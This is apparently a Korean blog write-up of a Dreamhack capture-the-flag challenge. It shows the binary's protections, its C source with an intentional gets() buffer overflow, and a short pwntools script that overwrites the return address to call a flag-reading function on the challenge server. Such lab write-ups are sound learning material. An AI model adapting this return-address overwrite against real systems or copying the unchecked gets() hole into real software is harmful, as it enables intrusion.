본문 바로가기
Dreamhack/pwn

basic_exploitation_001

32bit ELF이다.

file basic_exploitation_001
basic_exploitation_001: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 2.6.32, BuildID[sha1]=3e59f379d1f0653db81908d1d3a5eb9dce83816f, not stripped

 

Nx가 켜져 있지만 return address overwrite를 할 수 있으니 걱정할 필요 없다. 

checksec basic_exploitation_001
[*] '/root/dreamhack/basic001/basic_exploitation_001'
    Arch:       i386-32-little
    RELRO:      No RELRO
    Stack:      No canary found
    NX:         NX enabled
    PIE:        No PIE (0x8048000)
    Stripped:   No

 

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>


void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}


void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);

    signal(SIGALRM, alarm_handler);
    alarm(30);
}


void read_flag() {
    system("cat /flag");
}

int main(int argc, char *argv[]) {

    char buf[0x80];

    initialize();
    
    gets(buf);

    return 0;
}

 

대놓고 read_flag가 보인다. 

 

from pwn import *

r=remote('host3.dreamhack.games',22166)
payload=b'A'*132
payload+=p32(0x80485b9) #read_flag
r.send(payload)
r.interactive()

'Dreamhack > pwn' 카테고리의 다른 글

Stack Canary Quiz  (1) 2024.11.15
basic_exploitation_000  (1) 2024.11.15
Return Address Overwrite  (0) 2024.11.15
Calling Convention Quiz  (0) 2024.11.15
shell_basic  (1) 2024.11.15